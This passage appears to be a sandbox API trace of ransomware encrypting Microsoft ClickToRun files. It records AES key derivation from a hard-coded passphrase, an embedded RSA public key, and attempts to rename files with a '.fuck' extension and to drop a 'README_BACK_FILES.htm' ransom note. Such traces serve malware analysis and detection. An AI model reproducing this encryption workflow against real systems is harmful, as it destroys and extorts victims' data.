CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----\\", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.066] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0239.066] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2883140) returned 1 [0239.066] CryptImportPublicKeyInfo (in: hCryptProv=0x2883140, dwCertEncodingType=0x1, pInfo=0x2896b50*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2896b80*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2896b88*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2893bf0) returned 1 [0239.066] CryptEncrypt (in: hKey=0x2893bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0239.066] CryptEncrypt (in: hKey=0x2893bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28837a0*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28837a0*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0239.067] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28837a0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.067] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0239.067] CryptEncrypt (in: hKey=0x2893af0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0239.067] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.067] CloseHandle (hObject=0xffffffff) returned 1 [0239.067] CloseHandle (hObject=0xffffffff) returned 1 [0239.067] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.man.dat.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.x64.en-us.man.dat.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.x64.en-us.man.dat"), bFailIfExists=0) returned 0 [0239.068] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.man.dat", dwFileAttributes=0x0) returned 0 [0239.068] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.man.dat.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.x64.en-us.man.dat.gsg")) returned 0 [0239.068] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.x64.en-us.man.dat"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.man.dat.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.x64.en-us.man.dat.fuck")) returned 0 [0239.069] CryptDestroyHash (hHash=0x2893e70) returned 1 [0239.069] CryptDestroyKey (hKey=0x2893af0) returned 1 [0239.069] CryptReleaseContext (hProv=0x287fb98, dwFlags=0x0) returned 1 [0239.069] FindNextFileA (in: hFindFile=0x2893eb0, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0239.069] FindClose (in: hFindFile=0x2893eb0 | out: hFindFile=0x2893eb0) returned 1 [0239.069] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\readme_back_files.htm")) returned 0xffffffff [0239.070] AreFileApisANSI () returned 1 [0239.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x287fb98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 125 [0239.070] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.070] GetLastError () returned 0x5 [0239.070] GetLastError () returned 0x5 [0239.070] FindNextFileA (in: hFindFile=0x2893e30, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.070] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x2893e70 [0239.071] FindNextFileA (in: hFindFile=0x2893e70, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0239.071] FindNextFileA (in: hFindFile=0x2893e70, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0239.071] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0239.072] GetLastError () returned 0x5 [0239.072] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\masterdescriptor.x-none.xml")) returned 0x20 [0239.072] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\MasterDescriptor.x-none.xml", dwFileAttributes=0x80) returned 0 [0239.072] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\masterdescriptor.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.073] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\MasterDescriptor.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\masterdescriptor.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.073] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\MasterDescriptor.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.075] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x287fb98) returned 1 [0239.077] CryptCreateHash (in: hProv=0x287fb98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0239.077] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.077] CryptHashData (hHash=0x2893eb0, pbData=0x2884f08, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.077] CryptDeriveKey (in: hProv=0x287fb98, Algid=0x6610, hBaseData=0x2893eb0, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2893ef0) returned 1 [0239.077] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----6", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.077] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0239.077] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2883030) returned 1 [0239.078] CryptImportPublicKeyInfo (in: hCryptProv=0x2883030, dwCertEncodingType=0x1, pInfo=0x2895a40*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2895a70*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2895a78*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2894130) returned 1 [0239.078] CryptEncrypt (in: hKey=0x2894130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0239.078] CryptEncrypt (in: hKey=0x2894130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2883938*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2883938*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0239.078] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2883938, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.078] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0239.078] CryptEncrypt (in: hKey=0x2893ef0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0239.078] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.078] CloseHandle (hObject=0xffffffff) returned 1 [0239.078] CloseHandle (hObject=0xffffffff) returned 1 [0239.079] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\MasterDescriptor.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\masterdescriptor.x-none.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\masterdescriptor.x-none.xml"), bFailIfExists=0) returned 0 [0239.079] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\MasterDescriptor.x-none.xml", dwFileAttributes=0x0) returned 0 [0239.079] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\MasterDescriptor.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\masterdescriptor.x-none.xml.gsg")) returned 0 [0239.080] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\masterdescriptor.x-none.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\MasterDescriptor.x-none.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\masterdescriptor.x-none.xml.fuck")) returned 0 [0239.080] CryptDestroyHash (hHash=0x2893eb0) returned 1 [0239.080] CryptDestroyKey (hKey=0x2893ef0) returned 1 [0239.080] CryptReleaseContext (hProv=0x287fb98, dwFlags=0x0) returned 1 [0239.081] FindNextFileA (in: hFindFile=0x2893e70, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0239.081] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0239.081] GetLastError () returned 0x5 [0239.081] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\s640.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\s640.hash")) returned 0x20 [0239.081] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\s640.hash", dwFileAttributes=0x80) returned 0 [0239.081] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\s640.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\s640.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.082] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\s640.hash.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\s640.hash.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.082] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\s640.hash.gsg", dwFileAttributes=0x2) returned 0 [0239.083] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28831c8) returned 1 [0239.085] CryptCreateHash (in: hProv=0x28831c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0239.085] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.085] CryptHashData (hHash=0x2893eb0, pbData=0x28850c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.085] CryptDeriveKey (in: hProv=0x28831c8, Algid=0x6610, hBaseData=0x2893eb0, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2893ef0) returned 1 [0239.085] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----6", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.085] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0239.085] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28834f8) returned 1 [0239.086] CryptImportPublicKeyInfo (in: hCryptProv=0x28834f8, dwCertEncodingType=0x1, pInfo=0x2896670*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28966a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28966a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2893f30) returned 1 [0239.086] CryptEncrypt (in: hKey=0x2893f30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0239.086] CryptEncrypt (in: hKey=0x2893f30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2883360*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2883360*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0239.087] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2883360, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.087] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0239.087] CryptEncrypt (in: hKey=0x2893ef0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0239.087] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.087] CloseHandle (hObject=0xffffffff) returned 1 [0239.087] CloseHandle (hObject=0xffffffff) returned 1 [0239.087] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\s640.hash.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\s640.hash.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\s640.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\s640.hash"), bFailIfExists=0) returned 0 [0239.087] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\s640.hash", dwFileAttributes=0x0) returned 0 [0239.088] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\s640.hash.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\s640.hash.gsg")) returned 0 [0239.088] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\s640.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\s640.hash"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\s640.hash.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\s640.hash.fuck")) returned 0 [0239.090] CryptDestroyHash (hHash=0x2893eb0) returned 1 [0239.090] CryptDestroyKey (hKey=0x2893ef0) returned 1 [0239.090] CryptReleaseContext (hProv=0x28831c8, dwFlags=0x0) returned 1 [0239.090] FindNextFileA (in: hFindFile=0x2893e70, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0239.090] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0239.090] GetLastError () returned 0x5 [0239.090] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\Stream.Platform.x-none.man.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.platform.x-none.man.xml")) returned 0x20 [0239.091] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\Stream.Platform.x-none.man.xml", dwFileAttributes=0x80) returned 0 [0239.091] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\Stream.Platform.x-none.man.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.platform.x-none.man.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.092] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\Stream.Platform.x-none.man.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.platform.x-none.man.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.092] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\Stream.Platform.x-none.man.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.092] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x287fb98) returned 1 [0239.095] CryptCreateHash (in: hProv=0x287fb98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0239.095] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.095] CryptHashData (hHash=0x2893af0, pbData=0x2885020, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.095] CryptDeriveKey (in: hProv=0x287fb98, Algid=0x6610, hBaseData=0x2893af0, dwFlags=0x1000000, 